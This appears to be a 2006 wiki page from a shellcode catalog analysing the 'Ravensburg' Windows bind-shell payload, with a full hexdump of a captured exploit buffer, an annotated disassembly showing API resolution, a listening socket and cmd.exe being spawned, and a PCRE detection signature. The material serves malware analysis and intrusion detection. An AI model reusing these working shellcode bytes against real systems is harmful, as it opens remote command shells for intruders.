Table of Contents

Ravensburg Shellcode

Shellcode

raw

hexdump

00000000  00 00 23 f8 29 00 ff 23  05 39 1e c8 68 22 39 05  |..#ø).ÿ#.9.Èh"9.|
00000010  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000030  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000060  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000070  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000080  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000090  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000000c0  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
000000d0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000000e0  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
000000f0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000120  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000140  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
00000150  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000170  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
00000180  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000001a0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000001d0  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
000001e0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000001f0  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000200  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000230  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
00000240  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000250  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
00000260  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000290  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000002b0  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
000002c0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000002e0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
000002f0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000310  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000340  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000350  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000360  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000370  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000003a0  7c f4 3d 05 90 90 90 90  90 90 90 90 90 90 90 90  ||ô=.............|
000003b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000450  90 90 90 90 90 90 90 90  eb 23 7a 68 02 05 6c 59  |........ë#zh..lY|
00000460  f8 1d 9c de 8c d1 4c 70  d4 03 f0 27 20 20 30 08  |ø..Þ.ÑLpÔ.ð'  0.|
00000470  57 53 32 5f 33 32 2e 44  4c 4c 01 eb 05 e8 f9 ff  |WS2_32.DLL.ë.èùÿ|
00000480  ff ff 5d 83 ed 2a 6a 30  59 64 8b 01 8b 40 0c 8b  |ÿÿ].í*j0Yd...@..|
00000490  70 1c ad 8b 78 08 8d 5f  3c 8b 1b 01 fb 8b 5b 78  |p.­.x.._<...û.[x|
000004a0  01 fb 8b 4b 1c 01 f9 8b  53 24 01 fa 53 51 52 8b  |.û.K..ù.S$.úSQR.|
000004b0  5b 20 01 fb 31 c9 41 31  c0 99 8b 34 8b 01 fe ac  |[ .û1ÉA1À..4..þ¬|
000004c0  31 c2 d1 e2 84 c0 75 f7  0f b6 45 05 8d 44 45 04  |1ÂÑâ.Àu÷.¶E..DE.|
000004d0  66 39 10 75 e1 66 31 10  5a 58 5e 56 50 52 2b 4e  |f9.uáf1.ZX^VPR+N|
000004e0  10 41 0f b7 0c 4a 8b 04  88 01 f8 0f b6 4d 05 89  |.A.·.J....ø.¶M..|
000004f0  44 8d d8 fe 4d 05 75 be  fe 4d 04 74 21 fe 4d 22  |D.ØþM.uŸþM.t!þM"|
00000500  8d 5d 18 53 ff d0 89 c7  6a 04 58 88 45 05 80 45  |.].SÿÃ.Çj.X.E..E|
00000510  77 0a 8d 5d 74 80 6b 26  14 e9 78 ff ff ff 89 ce  |w..]t.k&.éxÿÿÿ.Î|
00000520  31 db 53 53 53 53 56 46  56 ff d0 97 55 58 66 89  |1ÛSSSSVFVÿÃ.UXf.|
00000530  30 6a 10 55 57 ff 55 d4  4e 56 57 ff 55 cc 53 55  |0j.UWÿUÔNVWÿUÌSU|
00000540  57 ff 55 d0 97 8d 45 88  50 ff 55 e4 55 55 ff 55  |WÿUÃ..E.PÿUäUUÿU|
00000550  e8 8d 44 05 0c 94 53 68  2e 65 78 65 68 5c 63 6d  |è.D...Sh.exeh\cm|
00000560  64 94 31 d2 8d 45 cc 94  57 57 57 53 53 fe c6 01  |d.1Ò.EÌ.WWWSSþÆ.|
00000570  f2 52 94 8d 45 78 50 8d  45 88 50 b1 08 53 53 6a  |òR..ExP.E.P±.SSj|
00000580  10 fe ce 52 53 53 53 55  ff 55 ec 6a ff ff 55 e0  |.þÎRSSSUÿUìjÿÿUà |
00000590  00 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000005a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000023f0  90 90 90 90 90 90 90 90  90 90 90 90              |............|
000023fc

Analysis

shellcode

0000041C                 dd 90909090h            ; ebp-3C
00000420 ptrWSASocketA   dd 90909090h            ; ebp-38
00000424 ptrlisten       dd 90909090h            ; ebp-34
00000428 ptraccept       dd 90909090h            ; ebp-30
0000042C ptrbind         dd 90909090h            ; ebp-2C
00000430                 dd 90909090h            ; ebp-28
00000434 ptrGetModuleHandleA dd 90909090h        ; ebp-24
00000438 ptrSleep        dd 90909090h            ; ebp-20
0000043C ptrGetStartupInfoA dd 90909090h         ; ebp-1C
00000440 ptrGetSystemDirectoryA dd 90909090h     ; ebp-18
00000444 ptrCreateProcessA dd 90909090h          ; ebp-14
00000448                 dd 90909090h            ; ebp-10
0000044C                 dd 90909090h            ; ebp-0C
00000450                 dd 90909090h            ; ebp-08
00000454                 dd 90909090h            ; ebp-04
00000458 ; ---------------------------------------------------------------------------
00000458                 jmp     short loc_47D
00000458 ; ---------------------------------------------------------------------------
0000045A                 dw 687Ah                ; port
0000045C                 db 2
0000045D                 db 5
0000045E                 dw 596Ch                ; Hash of GetModuleHandleA
00000460                 dw 1DF8h                ; Hash of Sleep
00000462                 dw 0DE9Ch               ; Hash of GetStartupInfoA
00000464                 dw 0D18Ch               ; Hash of GetSystemDirectoryA
00000466                 dw 704Ch                ; Hash of CreateProcessA
00000468                 dw 3D4h                 ; Hash of WSASocketA
0000046A                 dw 27F0h                ; Hash of listen
0000046C                 dw 2020h                ; Hash of accept
0000046E                 dw 830h                 ; Hash of bind
00000470 aWs2_32_dll     db 'WS2_32.DLL'
0000047A                 db    1
0000047B ; ---------------------------------------------------------------------------
0000047B
0000047B loc_47B:
0000047B                 jmp     short loc_482
0000047D ; ---------------------------------------------------------------------------
0000047D
0000047D loc_47D:
0000047D                 call    loc_47B
00000482
00000482 loc_482:
00000482                 pop     ebp
00000483                 sub     ebp, 2Ah ; '*'
00000486                 push    30h ; '0'
00000488                 pop     ecx
00000489                 mov     eax, fs:[ecx]   ; find kernel32 base address
0000048C                 mov     eax, [eax+0Ch]
0000048F                 mov     esi, [eax+1Ch]
00000492                 lodsd
00000493                 mov     edi, [eax+8]
00000496
00000496 loc_496:                                ; goto exporttable of module with handle edi
00000496                 lea     ebx, [edi+3Ch]
00000499                 mov     ebx, [ebx]
0000049B                 add     ebx, edi
0000049D                 mov     ebx, [ebx+78h]  ; ebx = Export Table RVA
000004A0                 add     ebx, edi
000004A2                 mov     ecx, [ebx+1Ch]  ; ecx = Export Address Table RVA
000004A5                 add     ecx, edi
000004A7                 mov     edx, [ebx+24h]  ; edx = Ordinal Table RVA
000004AA                 add     edx, edi
000004AC                 push    ebx
000004AD                 push    ecx
000004AE                 push    edx
000004AF                 mov     ebx, [ebx+20h]  ; ebx = Name Pointer Table RVA
000004B2                 add     ebx, edi
000004B4                 xor     ecx, ecx
000004B6
000004B6 loc_4B6:
000004B6                 inc     ecx
000004B7                 xor     eax, eax
000004B9                 cdq
000004BA                 mov     esi, [ebx+ecx*4] ; esi = Name RVA
000004BD                 add     esi, edi
000004BF
000004BF loc_4BF:
000004BF                 lodsb
000004C0                 xor     edx, eax
000004C2                 shl     edx, 1
000004C4                 test    al, al
000004C6                 jnz     short loc_4BF
000004C8                 movzx   eax, byte ptr [ebp+5] ; get index of 16-Bit hash needed
000004CC                 lea     eax, [ebp+eax*2+4]
000004D0                 cmp     [eax], dx
000004D3                 jnz     short loc_4B6   ; is this one needed ?
000004D5                 xor     [eax], dx       ; remove hash from table
000004D8                 pop     edx
000004D9                 pop     eax
000004DA                 pop     esi
000004DB                 push    esi
000004DC                 push    eax
000004DD                 push    edx
000004DE                 sub     ecx, [esi+10h]  ; [esi+10h]=Ordinal Base
000004E1                 inc     ecx
000004E2                 movzx   ecx, word ptr [edx+ecx*2] ; get ordinal of function
000004E6                 mov     eax, [eax+ecx*4] ; get functions RVA
000004E9                 add     eax, edi
000004EB                 movzx   ecx, byte ptr [ebp+5]
000004EF                 mov     [ebp+ecx*4-28h], eax
000004F3                 dec     byte ptr [ebp+5]
000004F6                 jnz     short loc_4B6   ; Last Import for This Module ?
000004F8                 dec     byte ptr [ebp+4]
000004FB                 jz      short loc_51E   ; Last Module ?
000004FD                 dec     byte ptr [ebp+22h] ; remove 1 after WS2_32.DLL to make it a 0-terminated string
00000500                 lea     ebx, [ebp+18h]  ; ebx = Ptr "WS2_32.DLL",0
00000503                 push    ebx
00000504                 call    eax             ; LoadLibraryA
00000506                 mov     edi, eax        ; edi = hModule of WS2_32.DLL
00000508                 push    4
0000050A                 pop     eax
0000050B                 mov     [ebp+5], al     ; set number of imports from WS2_32 needed
0000050E                 add     byte ptr [ebp+77h], 0Ah ; Modify Part of Import Loading Code
00000512                 lea     ebx, [ebp+74h]
00000515                 sub     byte ptr [ebx+26h], 14h
00000519                 jmp     loc_496         ; goto exporttable of module with handle edi
0000051E ; ---------------------------------------------------------------------------
0000051E
0000051E loc_51E:                                ; esi=1
0000051E                 mov     esi, ecx
00000520                 xor     ebx, ebx
00000522                 push    ebx
00000523                 push    ebx
00000524                 push    ebx
00000525                 push    ebx
00000526                 push    esi
00000527                 inc     esi
00000528                 push    esi
00000529                 call    eax             ; WSASocketA
0000052B                 xchg    eax, edi
0000052C                 push    ebp
0000052D                 pop     eax
0000052E                 mov     [eax], si
00000531                 push    10h
00000533                 push    ebp
00000534                 push    edi
00000535                 call    dword ptr [ebp-2Ch] ; bind
00000538                 dec     esi
00000539                 push    esi
0000053A                 push    edi
0000053B                 call    dword ptr [ebp-34h] ; listen
0000053E                 push    ebx
0000053F                 push    ebp
00000540                 push    edi
00000541                 call    dword ptr [ebp-30h] ; accept
00000544                 xchg    eax, edi
00000545                 lea     eax, [ebp-78h]
00000548                 push    eax
00000549                 call    dword ptr [ebp-1Ch] ; GetStartupInfoA
0000054C                 push    ebp
0000054D                 push    ebp
0000054E                 call    dword ptr [ebp-18h] ; GetSystemDirectoryA
00000551                 lea     eax, [ebp+eax+0Ch]
00000555                 xchg    eax, esp
00000556                 push    ebx
00000557                 push    'exe.'
0000055C                 push    'dmc\'
00000561                 xchg    eax, esp
00000562                 xor     edx, edx
00000564                 lea     eax, [ebp-34h]
00000567                 xchg    eax, esp
00000568                 push    edi
00000569                 push    edi
0000056A                 push    edi
0000056B                 push    ebx
0000056C                 push    ebx
0000056D                 inc     dh
0000056F                 add     edx, esi
00000571                 push    edx
00000572                 xchg    eax, esp
00000573                 lea     eax, [ebp+78h]
00000576                 push    eax
00000577                 lea     eax, [ebp-78h]
0000057A                 push    eax
0000057B                 mov     cl, 8
0000057D                 push    ebx
0000057E                 push    ebx
0000057F                 push    10h
00000581                 dec     dh
00000583                 push    edx
00000584                 push    ebx
00000585                 push    ebx
00000586                 push    ebx
00000587                 push    ebp
00000588                 call    dword ptr [ebp-14h] ; CreateProcessA
0000058B                 push    0FFFFFFFFh
0000058D                 call    dword ptr [ebp-20h] ; Sleep

shellcode patterns

bindshell

char *pcre = 
"\\xEB\\x23(..)\\x02\\x05\\x6C\\x59\\xF8\\x1D\\x9C\\xDE\\x8C\\xD1\\x4C\\x70"
"\\xD4\\x03\\xF0\\x27\\x20\\x20\\x30\\x08\\x57\\x53\\x32\\x5F\\x33\\x32\\x2E"
"\\x44\\x4C\\x4C\\x01\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5D\\x83\\xED\\x2A"
"\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x78"
"\\x08\\x8D\\x5F\\x3C\\x8B\\x1B\\x01\\xFB\\x8B\\x5B\\x78\\x01\\xFB\\x8B\\x4B"
"\\x1C\\x01\\xF9\\x8B\\x53\\x24\\x01\\xFA\\x53\\x51\\x52\\x8B\\x5B\\x20\\x01"
"\\xFB\\x31\\xC9\\x41\\x31\\xC0\\x99\\x8B\\x34\\x8B\\x01\\xFE\\xAC\\x31\\xC2"
"\\xD1\\xE2\\x84\\xC0\\x75\\xF7\\x0F\\xB6\\x45\\x05\\x8D\\x44\\x45\\x04\\x66"
"\\x39\\x10\\x75\\xE1\\x66\\x31\\x10\\x5A\\x58\\x5E\\x56\\x50\\x52\\x2B\\x4E"
"\\x10\\x41\\x0F\\xB7\\x0C\\x4A\\x8B\\x04\\x88\\x01\\xF8\\x0F\\xB6\\x4D\\x05"
"\\x89\\x44\\x8D\\xD8\\xFE\\x4D\\x05\\x75\\xBE\\xFE\\x4D\\x04\\x74\\x21\\xFE"
"\\x4D\\x22\\x8D\\x5D\\x18\\x53\\xFF\\xD0\\x89\\xC7\\x6A\\x04\\x58\\x88\\x45"
"\\x05\\x80\\x45\\x77\\x0A\\x8D\\x5D\\x74\\x80\\x6B\\x26\\x14\\xE9\\x78\\xFF"
"\\xFF\\xFF\\x89\\xCE\\x31\\xDB\\x53\\x53\\x53\\x53\\x56\\x46\\x56\\xFF\\xD0"
"\\x97\\x55\\x58\\x66\\x89\\x30\\x6A\\x10\\x55\\x57\\xFF\\x55\\xD4\\x4E\\x56"
"\\x57\\xFF\\x55\\xCC\\x53\\x55\\x57\\xFF\\x55\\xD0\\x97\\x8D\\x45\\x88\\x50"
"\\xFF\\x55\\xE4\\x55\\x55\\xFF\\x55\\xE8\\x8D\\x44\\x05\\x0C\\x94\\x53\\x68"
"\\x2E\\x65\\x78\\x65\\x68\\x5C\\x63\\x6D\\x64\\x94\\x31\\xD2\\x8D\\x45\\xCC"
"\\x94\\x57\\x57\\x57\\x53\\x53\\xFE\\xC6\\x01\\xF2\\x52\\x94\\x8D\\x45\\x78"
"\\x50\\x8D\\x45\\x88\\x50\\xB1\\x08\\x53\\x53\\x6A\\x10\\xFE\\xCE\\x52\\x53"
"\\x53\\x53\\x55\\xFF\\x55\\xEC\\x6A\\xFF\\xFF\\x55\\xE0";
 
 
csni/shellcodes/ravensburg.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki